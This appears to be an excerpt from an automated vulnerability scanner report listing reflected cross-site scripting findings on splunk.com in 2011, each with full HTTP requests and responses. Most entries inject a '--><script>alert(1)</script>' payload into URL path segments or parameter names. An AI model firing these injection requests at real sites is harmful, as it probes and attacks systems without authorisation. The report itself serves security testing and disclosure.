GET /view/resources/SP-CAAACGF144ec--><script>alert(1)</script>639ac29d6d6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.595. http://www.splunk.com/view/resources/SP-CAAACGF [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/resources/SP-CAAACGF
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 919c2--><script>alert(1)</script>3982ac994f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/resources/SP-CAAACGF?919c2--><script>alert(1)</script>3982ac994f=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: eb9cfeb9d7a6e24325ffde2edf44b8c41296944348 Last-Modified: Sat, 05 Feb 2011 22:19:08 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 50164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d450f--><script>alert(1)</script>42a7031b7c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewd450f--><script>alert(1)</script>42a7031b7c6/security-and-compliance-solutions/SP-CAAADSB HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:38 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:38 GMT; path=/ ETag: 49a34c81e83c003ee467cf27bae2c8db1296944198 Last-Modified: Sat, 05 Feb 2011 22:16:38 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 3a9fd--><script>alert(1)</script>47564be78ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/security-and-compliance-solutions3a9fd--><script>alert(1)</script>47564be78ef/SP-CAAADSB HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:11 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:11 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:11 GMT; path=/ ETag: d4641a57ecb4344e9a6e8705a84e0a831296944231 Last-Modified: Sat, 05 Feb 2011 22:17:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 1d314--><script>alert(1)</script>526c94c9c44 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/security-and-compliance-solutions/SP-CAAADSB1d314--><script>alert(1)</script>526c94c9c44 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5179e--><script>alert(1)</script>3f029930d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/security-and-compliance-solutions/SP-CAAADSB?5179e--><script>alert(1)</script>3f029930d0d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:44 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 378fb--><script>alert(1)</script>e6e9887ca3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view378fb--><script>alert(1)</script>e6e9887ca3e/services/SP-CAAAFQJ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:14 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:14 GMT; path=/ ETag: 5949bb1f2c981ebe7624e1a800aec3141296944114 Last-Modified: Sat, 05 Feb 2011 22:15:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 96328--><script>alert(1)</script>d3930effb69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/services96328--><script>alert(1)</script>d3930effb69/SP-CAAAFQJ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:50 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:50 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:50 GMT; path=/ ETag: 3c6b33044d2348f7f74840f87a9fe1eb1296944151 Last-Modified: Sat, 05 Feb 2011 22:15:51 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b9fea--><script>alert(1)</script>abceb6f05bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/services/SP-CAAAFQJb9fea--><script>alert(1)</script>abceb6f05bb HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.603. http://www.splunk.com/view/services/SP-CAAAFQJ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/services/SP-CAAAFQJ
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d63cc--><script>alert(1)</script>8e0336acb25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/services/SP-CAAAFQJ?d63cc--><script>alert(1)</script>8e0336acb25=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: dfa359c45172d7ec39a902328d590b171296944071 Last-Modified: Sat, 05 Feb 2011 22:14:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6480e--><script>alert(1)</script>5d666728ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view6480e--><script>alert(1)</script>5d666728ac/splunk-at-whitepages/SP-CAAAFUY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 5dbc03112d1392066e48343951ae874d1297008194 Last-Modified: Sun, 06 Feb 2011 16:03:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 760d6--><script>alert(1)</script>4082375e06b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/splunk-at-whitepages760d6--><script>alert(1)</script>4082375e06b/SP-CAAAFUY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; 